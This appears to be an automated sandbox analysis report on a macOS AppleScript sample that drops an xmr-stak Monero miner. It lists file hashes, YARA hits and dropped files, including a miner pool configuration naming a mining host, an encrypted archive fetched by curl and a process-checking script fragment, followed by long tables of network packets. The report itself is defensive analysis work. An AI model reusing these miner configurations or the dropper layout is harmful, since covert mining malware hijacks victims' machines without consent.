                                SHA-512:A36E8A5B3007DB6DE32FA7E06D400EF354CB4B0905002EE43383EE611990C978351502EBADFBCDD60AE2BA4E036200AB6CA2500B7D765D7F9D44AD79E1FA8345
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: /Users/henry/Library/Caches/com.apple.R0/config.txt, Author: Joe Security
                                Reputation:low
                                Preview: "call_timeout" : 10,."retry_time" : 30,."giveup_limit" : 0,."verbose_level" : 3,."print_motd" : true,."h_print_time" : 60,."aes_override" : null,."use_slow_memory" : "warn",."tls_secure_algo" : true,."daemon_mode" : false,."flush_stdout" : false,."output_file" : "",."httpd_port" : 0,."http_login" : "",."http_pass" : "",."prefer_ipv4" : true,
                                /Users/henry/Library/Caches/com.apple.R0/cpu.txt
                                Process:/usr/bin/osascript
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):117
                                Entropy (8bit):4.350370866166113
                                Encrypted:false
                                SSDEEP:3:z6cpk+fIKbK62HlhQhfeEQ+0DOQkFkM:z643fIKzgLweEN0iQkqM
                                MD5:657714D2ACA5F0BCC4E7F4F6DBC32C93
                                SHA1:6EAFAF7F3E8FB121ED1BA37BF6604F9D10FAD827
                                SHA-256:AC8EB3CCE3B254D7B1A37D98A4A1BBE7F3DE981BB3CB8E51775CD7355AA31865
                                SHA-512:4680BCEA3D582E576E76BC99CB83DC0591529651152B2E9C085ABE1BCD9665325C2DFCAE9D933F9B9526A6BAE564D43D57F495CD168739DF8D6C52BE9C20F969
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: /Users/henry/Library/Caches/com.apple.R0/cpu.txt, Author: Joe Security
                                Reputation:low
                                Preview: "cpu_threads_conf" :.[. { "low_power_mode" : true, "no_prefetch" : true, "asm" : "auto", "affine_to_cpu" : 0 },.],
                                /Users/henry/Library/Caches/com.apple.R0/openssl/lib/.BC.T_YhxWdX
                                Process:/usr/bin/ditto
                                File Type:Mach-O 64-bit dynamically linked shared library
                                Category:dropped
                                Size (bytes):530108
                                Entropy (8bit):5.960861980230541
                                Encrypted:false
                                SSDEEP:12288:6/d5qGRmgAbWW3Qkc9DjP+eQNFnXSVTXyPzCoTCu8+OhmE2eJUN:wRgbj35+jPNQNFnXSV65E2eJUN
                                MD5:ACE2010E99261B816EF929EC44ED0960
                                SHA1:396BC19157480E65795918D1ADC4B5A454066D81
                                SHA-256:2C8473C3B23F958DAF5A1BBD68A92B98C19A151DE96C67CED466FD961875BBEB
                                SHA-512:1A112E4F709AFDA079E81CA0ABDB70746E8833654C45225CF8194DF69B9CF15D7428CBC989849E4B69FB7CFB3629A520F005487E12118D9A324E7085BB1EBB53
                                Malicious:false
                                Reputation:low
                                Preview: ....................x...............(...__TEXT..........................................................__text..........__TEXT..........`...............`...............................__stubs.........__TEXT..........r.......b.......r...............................__stub_helper...__TEXT..................^.......................................__cstring.......__TEXT..........@.......W.......@...............................__const.........__TEXT..........................................................__unwind_info...__TEXT..................D...........................................(...__DATA..........................................................__nl_symbol_ptr.__DATA..........................................................__got...........__DATA..........................................................__la_symbol_ptr.__DATA..........................................................__const.........__DATA..........p........{......p...............................__data..........__DATA..
                                /Users/henry/Library/Caches/com.apple.R0/openssl/lib/.BC.T_uTxDuv
                                Process:/usr/bin/ditto
                                File Type:Mach-O 64-bit dynamically linked shared library
                                Category:dropped
                                Size (bytes):2371372
                                Entropy (8bit):6.618683746775227
                                Encrypted:false
                                SSDEEP:49152:ySJ4BwXtJyrnt14IU6iOK5KpDzeDYg0OgOCjDN95C4kbVVrj+WE9WL62eJU/g:7KCryzH+B5KpWDhwDN95fIVrrE9WL62G
                                MD5:4B0CA749BD21223C805F0C5971536166
                                SHA1:1F8B5FCDA5FF169ECF80A8E1082848AC7BF2F384
                                SHA-256:454E79C26A80693A56169D02E6EE18B36037F2243D2953F61FF56557C8DEE186
                                SHA-512:C9AB340EE1F44197DD9E610AC83A01223B941939C82049B2AAC7A3E904CBD93F56D39A08A0DFDFB1B6465B4E4CA9849652CCF779BE40DFC29356E0F7A3C0B409
                                Malicious:false
                                Reputation:low
                                Preview: ....................................(...__TEXT..........................................................__text..........__TEXT..................h8......................................__stubs.........__TEXT..........hH..............hH..............................__stub_helper...__TEXT..........pK..............pK..............................__const.........__TEXT...........P.......N.......P..............................__cstring.......__TEXT..........................................................__unwind_info...__TEXT..........tJ.......,......tJ......................................__DATA..........................................................__nl_symbol_ptr.__DATA..........................................................__got...........__DATA..........................................................__la_symbol_ptr.__DATA..........................................................__mod_init_func.__DATA..........................................................__const.........__DATA..
                                /Users/henry/Library/Caches/com.apple.R0/pools.txt
                                Process:/usr/bin/osascript
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):228
                                Entropy (8bit):4.515927358974562
                                Encrypted:false
                                SSDEEP:6:R+lHQ/1nktH4mWtH/DFlXDfkxlhtPshfDGvKoQX:RIw/0AfvXD8xHtPWLD
                                MD5:654C34267D9A2AD88DD410D49BDB39EB
                                SHA1:00A4790F91BF6754A913414F9D304061100FCF42
                                SHA-256:F1AC4265B7AD09F11818B50BEC3161A15F88940ED676163C0DD6F4E6DF267907
                                SHA-512:1414D645AA8CBF7A862071D795AB7400391F2C6038700B563CBD24278EC92FDF79A629F83B48632093151AD0FC5F56F90609F81594468B5BA86DE205CC5D2AF0
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: /Users/henry/Library/Caches/com.apple.R0/pools.txt, Author: Joe Security
                                Reputation:low
                                Preview: "pool_list" :.[..{"pool_address" : "budaybu.com:8888", "wallet_address" : "", "rig_id" : "", "pool_password" : "x", "use_nicehash" : true, "use_tls" : false, "tls_fingerprint" : "", "pool_weight" : 1 },.],."currency" : "monero",
                                /Users/henry/Library/Caches/com.apple.R0/ssl.zip
                                Process:/usr/bin/curl
                                File Type:Zip archive data, at least v1.0 to extract
                                Category:dropped
                                Size (bytes):1629446
                                Entropy (8bit):7.996616785118869
                                Encrypted:true
                                SSDEEP:49152:69d2LPU66YfWqX/qXcSJc0zy1H2WALJbSzlxxc:6hqfWqXSsSFEWrJbSzlI
                                MD5:6BD01C8DDBCCA5ED4B5DFE62518865F1
                                SHA1:40012F5C6A90A2B135FA552F975B9BE95BFAB53A
                                SHA-256:D63E48873EEC22C1BE1823209C4C9FF7EFE25EBE6607BFAC8526DBBA511704D8
                                SHA-512:F27C22A33CC0F496A0A920E83D1CF7988F33C25FC772195366C485686D902B1914F6D27B93D0DE47058E3AFC3DEC75D86156A26F44A507891063C835EF0688E0
                                Malicious:false
                                Reputation:low
                                Preview: PK........h.4P................openssl/UX..$h%^$h%^....PK..........4P................openssl/lib/UX..Xh%^Xh%^....PK..........4P............!...openssl/lib/libcrypto.1.0.0.dylibUX...g%^.g%^.......|T..0>.L.......5@.h...8h.E..3r.g ... (...I!....$...h...Z.....q......g...@.#.W....L <.+.....g.C{.......f.~...............t:}.N.K.O*|<.(..u.w3|...t..M.=>Q..o..=...O.V<mZ...........f..).7E.5..Df.M._X...+....8....>..Q.....M.5sv..y=.+xD..%!...*~3.../..G....x...B.D.......y..}....>............p..Es.<?..i......^.X1......0".p.j...<Q....GK\t~...k.c.......y.3......."<cD>>..y.4...............Xx....~.j.}.....G..]....oN>N..........oeq4..........w..<...?.....+.M.....OG...e..t5..._..3..G...e...r...E...a..F..9.s....../;.O$.b.!...q..=b...:1}....4[....Bp"a......`.^O.../..QT..3.gN+x.p....3...?....?....^.(..G.'..=.2..z...$?[.C...s..^...@.......t....."...L.._..t|..[...@Y....Q|...vC.W{...V......<..U...#.._..~.O~...'.nte.4...K...Kw..d...m.p./...p.....h.. o&.<.p..{FE..N.N.......C....L]i.D..._...................&).....0.
                                /Users/henry/Library/k.plist
                                Process:/bin/sh
                                File Type:data
                                Category:dropped
                                Size (bytes):3482
                                Entropy (8bit):5.49487080572662
                                Encrypted:false
                                SSDEEP:96:eFmGz7eIfKfKZ7I3HCPgf/NFW7hwD4urY:e0GzP6K63+4u71urY
                                MD5:A09C9A70187AEFDFADCBE69E230619C2
                                SHA1:EBDCCE309E2538737BD20AB471FE9B409C922DA3
                                SHA-256:9ADCC1DA7BB98E52EA3E2B51ABCC1B23FCECBF5A72A50CA4E92971268D7D7BEB
                                SHA-512:E10329A4B2D4BAD9DF0D0E4A513D9B794FB94E6F81C6A104F3733063E34C3D3EFC1643E2C019661E4CEE639DE6C839EF2ACD81DA018BF07D5A1EEB780F657703
                                Malicious:true
                                Reputation:low
                                Preview: FasdUAS 1.101.10......................................................................0..e.......0..d.......0..kpro..kPro......aevtoappnull........****.........................0..e...................................0.._s.......................0.._s.......0..x.......0..c.............................ID ......kocl......cobj......corecnte****........****....d......pcnt......TEXT......kfrmID ....+..,E.O....[..l...kh........,F[OY..O*...0E...........................0..d...................................0.._s.......................0.._s.......0..x.......0..c.............................ID ......kocl......cobj......corecnte****........****....d......pcnt......TEXT......kfrmID ....+..,E.O....[..l...kh........,F[OY..O*...0E...........................0..kpro..kPro.................................0.._name.....................0.._name.......0.._id.....................................p.s. .a.x. .|. .g.r.e.p. ......strq............D. .|. .g.r.e.p. .-.v. .g.r.e.p. .|. .a.w.k. .'.{.p.r.i.n.t. .$.1.
                                /dev/null
                                Process:/Users/henry/library/Caches/com.apple.R0/ssl4.plist
                                File Type:ASCII English text
                                Category:dropped
                                Size (bytes):2351
                                Entropy (8bit):4.756464220337251
                                Encrypted:false
                                SSDEEP:48:oaABraIc6jMdeP8MafzzJgV90LvZlWHTjGlWqrq2jI52SIUadOfg:oTzoC8XCsqEPCIN
                                MD5:1EBEDCDE8247B694E1B2627914FE9071
                                SHA1:D68817C88850FA26961F520718BC6BCC377B931A
                                SHA-256:0C225355C4D39332291CFEEE3AE4D7A45DCA04B65036E602A1AE462C163BD830
                                SHA-512:1F7DCE4789F251887BDBC548DAA597ED48A21897832FD570828D41D183DBA82E7D0788CB02C3ED22990317CC02C6505BA7EF14CF3B7C3238A7CE0FE4EDFA71E0
                                Malicious:false
                                Reputation:low
                                Preview: [2021-01-15 12:00:57] : start self test for 'randomx' (can be disabled with the command line option '--noTest').-------------------------------------------------------------------.xmr-stak-rx 1.0.4-rx 65ade74b9..Brought to you by fireice_uk and psychocrypt under GPLv3..Based on CPU mining code by tevador and SChernykh..-------------------------------------------------------------------.You can use following keys to display reports:.'h' - hashrate.'r' - results.'c' - connection.-------------------------------------------------------------------. ##### ______ ____. ## ## | ___ \ / _ \.# _ #| |_/ /_ _ ___ | / \/ _ _ _ _ _ _ ___ _ __ ___ _ _.# |_| #| /| | | | / _ \ | | | | | || '_|| '_|/ _ \| '_ \ / __|| | | |.# #| |\ \| |_| || (_) || \_/\| |_| || | | | | __/| | | || (__ | |_| |. ## ## \_| \_|\__, | \___/ \____/ \__,_||_| |_| \___||_| |_| \___| \__, |. ##### __/ |

                                Static File Info

                                General

                                File type:data
                                Entropy (8bit):3.408444627153372
                                TrID:
                                • Compiled AppleScript script (8008/1) 100.00%
                                File name:gqnmir4Hus
                                File size:33738
                                MD5:831c1ec1b594ace3c97787b077ba9dac
                                SHA1:93b2653a4259d9c04e5b780762dc4abc40c49d35
                                SHA256:df550039acad9e637c7c3ec2a629abf8b3f35faca18e58d447f490cf23f114e8
                                SHA512:4f0420337a587093f36928edb6da117cfd6681c4b1b920cfe2881b83439b157d4fe067279998770cae5fdf2d8fa48d4c85b9396901d62e3254d995a8a0e5f385
                                SSDEEP:192:eDGzpX3LCLOoTIBnVg4wXdyWGxwv3qdmpk3w26hIviZ6pZujTGtTTTTTAfbDAAZu:btHo1Xlq7RRnU6SIw3gKoJ
                                File Content Preview:FasdUAS 1.101.10......................................................................0..e.......0..d.......0..r_t........aevtoappnull........****.........................0..e...................................0.._s.......................0.._s.......0..x.

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                01/15/21-11:00:44.307051ICMP368ICMP PING BSDtype192.168.0.5023.5.107.206
                                01/15/21-11:00:44.307051ICMP366ICMP PING *NIX192.168.0.5023.5.107.206
                                01/15/21-11:00:44.307051ICMP384ICMP PING192.168.0.5023.5.107.206
                                01/15/21-11:00:44.315076ICMP408ICMP Echo Reply23.5.107.206192.168.0.50

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Jan 15, 2021 11:00:37.753019094 MEZ4924080192.168.0.5017.253.57.205
                                Jan 15, 2021 11:00:37.761542082 MEZ804924017.253.57.205192.168.0.50
                                Jan 15, 2021 11:00:37.761885881 MEZ4924080192.168.0.5017.253.57.205
                                Jan 15, 2021 11:00:44.521574020 MEZ492438080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:44.769689083 MEZ80804924343.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:44.770153046 MEZ492438080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:44.770548105 MEZ492438080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:45.019665956 MEZ80804924343.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:45.020179987 MEZ492438080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:45.023823023 MEZ492438080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:45.088963985 MEZ492448080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:45.271440029 MEZ80804924343.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:45.271943092 MEZ492438080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:45.342830896 MEZ80804924443.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:45.343275070 MEZ492448080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:45.343494892 MEZ492448080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:45.605809927 MEZ80804924443.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:45.605834007 MEZ80804924443.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:45.606278896 MEZ492448080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:45.868156910 MEZ80804924443.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:45.868236065 MEZ80804924443.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:45.868253946 MEZ80804924443.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:45.868268967 MEZ80804924443.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:45.868712902 MEZ492448080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:45.868751049 MEZ492448080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:45.868824005 MEZ492448080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:45.871285915 MEZ492448080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:46.124100924 MEZ80804924443.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:46.124690056 MEZ492448080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:50.761352062 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:51.023386955 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:51.023842096 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:51.024009943 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:51.287779093 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:51.287802935 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:51.288295031 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:51.541501999 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:51.541546106 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:51.541563034 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:51.541578054 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:51.542110920 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:51.542156935 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:51.542217016 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:51.795878887 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:51.795896053 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:51.795903921 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:51.796044111 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:51.796052933 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:51.796061039 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:51.796380043 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:51.796430111 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:51.796468973 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:51.796475887 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:51.796597958 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:51.796602964 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:51.796900988 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:51.797054052 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.059235096 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.059262991 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.059277058 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.059583902 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.059792042 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.059802055 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.059818983 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.059835911 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.059851885 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.059864998 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.059869051 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.059884071 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.059899092 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.059968948 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.059983969 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.059998989 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.060014963 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.060030937 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.060110092 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.060864925 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.060899973 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.060909033 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.060914040 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.060919046 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.062288046 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.320116997 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.320142031 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.320156097 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.320291996 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.320308924 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.320326090 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.320341110 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.320426941 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.320626020 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.320641041 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.320693970 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.320733070 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.320740938 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.320775986 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.320899963 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.320974112 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.321336031 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.380125046 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.380227089 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.380244017 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.380259037 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.380275011 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.380290985 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.380403042 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.380418062 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.380434036 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.380450010 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.380465984 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.380773067 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.380808115 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.380824089 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.380840063 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.380853891 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.380872011 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.380887032 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.380903006 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.380940914 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.380955935 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.380970955 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.381299973 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.381337881 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.381432056 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.381443024 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.381448030 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.381452084 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.381702900 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.381714106 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.381752014 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.381759882 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.381819963 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.381830931 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.381994009 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.573429108 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.573452950 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.573468924 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.573551893 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.573569059 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.573584080 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.573600054 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.573616028 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.573774099 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.574002028 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.574018955 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.574035883 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.574057102 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.574067116 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.574073076 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.574073076 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.574078083 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.574090958 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.574106932 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.574125051 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.574151039 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.574167013 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.574182987 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.574198961 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.574203968 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.574253082 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.574356079 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.574493885 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.574506998 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.574512959 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.574738026 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.634390116 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.634495020 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.634536982 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.634563923 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.634579897 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.634597063 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.634612083 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.634627104 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.634656906 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.634673119 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.634686947 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.634702921 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.634718895 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.634735107 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.634748936 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.634823084 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.634905100 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.635051966 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.635616064 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.635651112 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.635658026 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.635663033 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.635667086 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.635672092 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.635677099 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.635680914 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.635926008 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:52.679922104 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.679946899 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.679963112 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.679981947 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.680021048 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:52.680037975 MEZ80804924543.249.204.231192.168.0.50
